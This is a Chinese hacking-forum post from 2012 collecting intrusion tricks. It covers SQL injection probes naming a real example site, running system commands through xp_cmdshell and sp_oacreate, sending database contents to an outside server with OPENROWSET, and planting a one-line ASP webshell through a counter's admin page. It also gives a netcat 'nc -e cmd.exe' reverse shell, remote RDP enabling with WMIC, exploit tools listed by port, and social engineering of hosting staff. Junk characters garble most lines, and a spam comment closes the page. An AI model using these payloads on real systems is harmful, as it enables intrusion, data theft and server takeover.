中国网络渗透测试联盟

标题: 站库分离的方法 [打印本页]

作者: admin    时间: 2012-9-15 14:41
标题: 站库分离的方法
SA点数据库分离技术相关7 ^0 z  \3 P& u+ |) c9 d

" \0 D3 B% ^& U* L8 z2 v
- q: I8 @& L* i9 j$ B6 Z# ASA点数据库分离搞法+语句:
! b2 R; ]  O& K0 m- F3 c8 _/ ?5 P' @
注射点不显错,执行下面三条语句页面都返回正常。1 G6 @# K# @8 ]# p) u1 N8 W- P
and 1=(select count(*) FROM master.dbo.sysobjects where name= 'xp_regread')  {/ a6 x8 m0 Q, ?# ?
and 1=(select count(*) FROM master.dbo.sysobjects where name= 'sp_makewebtask')
/ n/ [5 X$ A! \and 1=(select count(*) FROM master.dbo.sysobjects where xtype = 'X' AND name = 'xp_cmdshell')
* @! V5 B9 p( M6 P" P可以列目录,判断系统为2000,web与数据库分离; K2 R  J1 d7 [4 _
遇到这种情况首先要想办法得到数据库IP来进行下一步得渗透了。
4 v0 A. }1 j+ @. @在注射点上执行4 c3 U0 A$ r3 @) L6 Y3 K
declare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\winnt\system32\cmd /c net user ';--
6 c% g, V8 c) g: h9 l' k) W页面返回正常,通过上面这个命令执行telnet我一个外网肉鸡得1433端口,然后netstat/an没有得到IP9 k* g' U5 V4 N% u+ w
还有我用NC监听得其他端口都没有得到IP。! m: ~% x: @. b" T5 H
7 ^, |, h6 G) @1 i$ p8 e5 x
通过注射点执行下面这两个命令页面都返回异常,在肉鸡上面同样也是没有得到IP。
( X/ j$ e- h. b5 G$ O5 V3 p- q* m'insert into opendatasource('sqloledb','server=xxx.xxx.xxx.xxx;uid=sasa;pwd=sasa;database=tempdb').tempdb.dbo.temp select name from master.dbo.sysdatabases--. E- Y5 M" ]4 T, \5 ?; `* b
. y' o4 o) `* V) N& q( a  ?& x
;insert into OPENROWSET('SQLOLEDB','uid=sa;pwd=pass;Network=DBMSSOCN;Address=xxx.xxx.xxx.xxx,1433;', 'select * from dest_table') select * from src_table;--5 z" b! q& c8 B2 v9 ~6 @
2 ?) b* S/ n& _& h0 o5 [; U
现在就猜想是不是数据库是内网而且不能连外网。
$ D" D# B5 c5 H3 M1 V2 l
6 }0 B0 v/ l( O, n- e5 ^  P9 C) F0 ~/ R) n5 f- i* E7 k; k
access导出txt文本代码
1 P  r& V( ^" }6 HSELECT * into [test.txt] in 'd:\web\' 'text;' from admin
9 h3 D! E5 c- C+ @/ Z$ H3 q* z; A7 N8 h2 _& I5 b! o# p- K
: A1 b9 r0 W4 Z1 X# Z8 W$ S8 w; ~+ T8 o
5 h! @+ W" v, W8 x  N1 @5 ^
自动跳转到指定网站代码头
! W$ |7 \4 d% e  u/ {  S<body onload='vbscript:document.links(0).href="http://www.google.com":document.links(0).innerHTML="www.sohu.com"'>
2 ?' ^- L( w, C3 D$ G) ^1 S; f6 m

2 d3 J/ U( P/ p5 k- s% v* X7 V; _) M入侵java or jsp站点时默认配置文件路径:$ ]: B- r/ R, x, o" ^/ o
\web-inf\web.xml) e+ e' e+ \5 }! `" o
tomcat下的配置文件位置:
  y8 w! E9 q  ~% s! I5 `! o\conf\server.xml            (前面加上tomcat路径)+ e. [, g7 p6 o' L* m+ W% n
\Tomcat 5.0\webapps\root\web-inf\struts-config.xml
# K; Z& w, x. N: e( A5 ~; z& K3 f& O" {  D: h

+ z: K3 y$ t: }0 \& v+ R% Y5 z, W# y  F  P. s
检测注入点新方法运算符法,在过滤了and or cookies时用比有效果:& O( g) C3 K5 d$ ^( R: }# m
-1%23; `# V; k) \# n# C* f, \7 u
> / h' \7 S" K! k) |# A' L" o; D
<& g" j0 u% X( T5 `7 h$ E; H3 S! y# i
1'+or+'1'='12 P/ L% h) z5 T5 d" j$ Z& w3 M
id=8%bf
/ i! e/ B2 {! V3 W3 ?3 R9 t* x2 N* I/ @2 P. ], ~: D
全新注入点检测试法:; F0 h: ]$ n- V/ @
在URL地址后面加上-1,URL变成:http://gzkb.goomoo.cn/news.asp?id=123-1,如果返回的页面和前面不同,是另一则新闻,则表示有注入漏洞,是数字型的注入漏洞;在 URL地址后面加上 -0,URL变成 http://gzkb.goomoo.cn/news.asp?id=123-0,返回的页面和前面的页面相同,加上-1,返回错误页面,则也表示存在注入漏洞,是数字型的。
8 N+ l3 K& K& g' w2 S; o" c9 I
1 Z* p) Z( x2 _  d# p) v, Z3 x在URL的地址后面加上'%2B',URL地址变为:http://gzkb.goomoo.cn/news.asp?id=123'%2B',返回的页面和1同;加上'2%2B'asdf,URL地址变为:http://gzkb.goomoo.cn/news.asp?id=123'%2Basdf,返回的页面和1不同,或者说未发现该条记录,或者错误,则表示存在注入点,是文本型的。4 U( R) Z! g4 s  b2 D
$ T& t# \% b. V! b
搜索型注入判断方法:
2 i3 o: ~* G4 s, w/ E0 G* v北京%' and '1'='1' and '%'='
! s9 Q" v$ U6 O6 I北京%' and '1'='2' and '%'='
3 T' n' r1 d6 b# x; H' r
9 V- A1 G+ ?$ }. a! I, ^0 k; n0 ]8 T& g1 }. o( W5 a  Q6 R* b
COOKIES注入:
+ x5 u, x. `% ~4 l# x: ?' t0 |* a7 j/ q! H- V% B; D6 y
javascript:alert(document.cookie="id="+escape("51 and 1=1"));; S7 q' m: B5 \5 r1 r  r
  V6 z) p* _' A' l
2000专业版查看本地登录用户命令:
3 {* F& C$ t0 mnet config workstation1 v3 U8 ^" c. \; j! U
" S6 b" @0 T: t

0 R6 l; Y2 A2 P, \5 E1 c2003下查看ipsec配置和默认防火墙配置命令:0 p# m2 X& }- a, D' d2 w% B9 |+ i
netsh firewall show config
8 s; T5 o: Y; |* m  S$ q. D- Q: ]1 Unetsh ipsec static show all8 s) A$ d3 `. v/ \) q- _6 ^, ~" N
2 O3 a) u. d) l0 @, G: g
不指派指定策略命令:) @% d2 o$ I4 t0 J# x
netsh ipsec static set policy name=test assign=n  (test是不指派的策略名)
6 m/ m! w, M& ?( enetsh ipsec static show policy all  显示策略名, Y' V+ e' c  h) U! x5 {

  H, s" _/ U/ L, o$ X: o: p6 \1 e1 q; o! U7 q
猜管理员后台小技巧:
3 T  \1 Z& w4 C1 U+ q+ m# Iadmin/left.asp
8 e. p( ?9 q( V1 C( Iadmin/main.asp) }6 g) b/ }) P2 o3 d8 F+ W2 W: Y7 R
admin/top.asp
! R9 S+ S! k% Z0 C; K- vadmin/admin.asp 6 s7 t  N. d7 s  Q. m
会现出菜单导航,然后迅雷下载全部链接
+ j- }) w- A/ L. o* V
$ ~) z# j! _0 Y/ D+ G7 j. N- r
: H' V3 C3 X: t& c$ n- w  q0 R- b+ k社会工程学:
: h6 s9 y+ j% S/ _用这个查信息 http://tool.chinaz.com/ Whois查域名注册人和维护人0 X. K4 B7 R& ?
然后去骗客服) O9 f, c" h3 J# K: @! k! \
6 V7 Q3 E/ I* }- R# C0 |
1 k( U+ w- t" P1 X* Z
统计系统使用的是IT学习者的统计系统,在网上下载了一套回来研究。这样的系统拿webshell一般就二种:1.数据库插一句话木马,客户端连接得到。2.网站配置页面写入木马代码拿webshell。打开数据库目录,发现数据库扩展名是asp的,默认路径:data/#ITlearner.asp,把数据库扩展名改成*.mdb,用明小子的数据库工具打开,发现有防下载的表。管理员的默认密码是:ITlearner。数据库插一句话木马这条路是走不通了,现在只有看第二种方法看行不。输入默认密码进入 http://www.cnc-XX.com/admin/cutecounter /admin.asp?action=ShowConfig,查看原代码: % e4 Y# a* F" S, Y$ P- y" U+ `- h
查找 修改maxlength="3"为maxlength="100">这里是为了突破固定长度的字符输入。然后查找 处 修改为action="http://www.cnc-XX.com/admin/cutecounter/admin?Action=SaveConfig">,
; f. x; R) \; d. r  存为html文件打开后在最后详细来访信息记录多少条记录,默认为100条框输入100:eval request(chr(35)),点击保存。提示无法找到,结果发现。0 U2 Y( @0 h# d: R
9 U2 _% B- H6 E( w3 y* k3 P

# N3 X1 y2 t" R! z
9 b) X& \' c6 x3 i* j6. 554端口 用real554.exe入侵。 6129端口 用dameware6129.exe入侵。 系统漏洞 利用135、445端口,用ms03026、ms03039、ms03049、ms04011漏洞, 进行溢出入侵。 3127等端口 可以利用doom病毒开的端口,用nodoom.exe入侵。(可用mydoomscan.exe查)) R" E: }# H) F* A

8 R7 A5 C2 a/ L: D8 T1 A0 Q2 p" ^) |* a1 @, A, F/ q" k9 u( h1 ?# A

* Q& `; S0 G" D, KCMD加密注册表位置
1 ~+ e5 A. U; Q$ ](1)HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Command Processor
& |; x* j) b1 n5 b( mAutoRun2 z& E/ j: j6 J/ ]" A- Y

6 h/ ]" O, Y5 x6 c2 N, D2 F(2)HKEY_CURRENT_USER\Software\Microsoft\Command Processor
! E8 A1 G; g  ^, |8 jAutoRun( X, }9 \. j  S1 z, Q

- c4 O3 p. m3 j. F
8 m2 h, Q9 |! `# O在找注入时搜索Hidden,把他改成test
) ]$ A% |6 ~4 f6 G, ?3 `' g. s8 G9 p5 d' d7 [" ~6 C/ S; N

- ^  e5 P7 N; [3 ]* T3 [8 O! a3 K7 B0 v
mstsc /v:IP /console
/ i/ b* t( x3 {1 r* J! ?8 Y9 k' B1 g( h0 v9 W2 r# `1 F5 r( M
; w# T6 q( O7 j  ]0 L( y; s4 j
一句话开3389:# X; @7 s1 O$ J
' }0 d. M: c* j# f
最近我在网上看到新出了一种方法,一句话开3389,不过好像听说只能用于2003系统,唉,还是写出来和大家分享一下吧.很简单的,wmic RDTOGGLE WHERE ServerName='%COMPUTERNAME%' call SetAllowTSConnections 1 adh=Kp e!w 8 kw`=wSH>  6 a! u( G3 c* _% I- G
开远程:WMIC /node:"远程机器名" /user:"administrator" /password:"lcx" RDTOGGLE WHERE ServerName='远程机器名' call SetAllowTSConnections 1          就是这样了,其实还有其他的一些方法开2003的3389,我这里也不多作介绍了,大家有空上网一查就知道了.* [, J% g4 e3 V+ g7 ^- z

. ~5 [0 k1 q7 h% G; V5 @  }% |7 [2 O% K- D
知道表名,字段,使用SQL语句在ACCESS数据库中加个用户名及密码语句如下:
% b2 a* C1 H4 ~8 i0 G5 B0 oInsert into admin(user,pwd) values('test','test'), [% p- n7 f! P
/ M. b( F# F1 ?% {
, h( i7 R5 w! a1 g
NC反弹
1 s+ ^0 _/ q( k4 O& v先在本机执行:     nc -vv -lp 监听的端口     (自己执行)   ! t, L; \  Y+ m
然后在服务器上执行:  nc -e cmd.exe 自己的IP 和监听的端口 (对方执行)
! G8 z/ `+ B, ~* I+ C! r5 D$ ~/ A0 F: r- ]# d

, u7 p0 y) c/ |* h在脚本入侵过程中要经常常试用%00来确认下参数是否有问题" Y- u1 u4 D, Q  [: z# ]+ C

0 _/ R$ c) ^5 m. m有时候我们入侵的时候,在webshell没有办法列举网站的目录包括dir也不行的时候,这个时候可以尝试用DOS命令SUBST转移目录
$ a/ L/ V) v" g) ?! o4 a例如:& q4 U( [1 {3 b( k
subst k: d:\www\ 用d盘www目录替代k盘
% t% ?" Y5 K' @: Q3 K  T3 nsubst k: /d  解除K盘代替
作者: 匿名    时间: 2017-12-20 02:36
We are a group of volunteers and starting a new scheme in our community.
Your web site offered us with valuable information to work on. You've done a formidable job and our entire community will
be grateful to you.
Website: Antispur Duo Forte proprieta




欢迎光临 中国网络渗透测试联盟 (https://cobjon.com/) Powered by Discuz! X3.2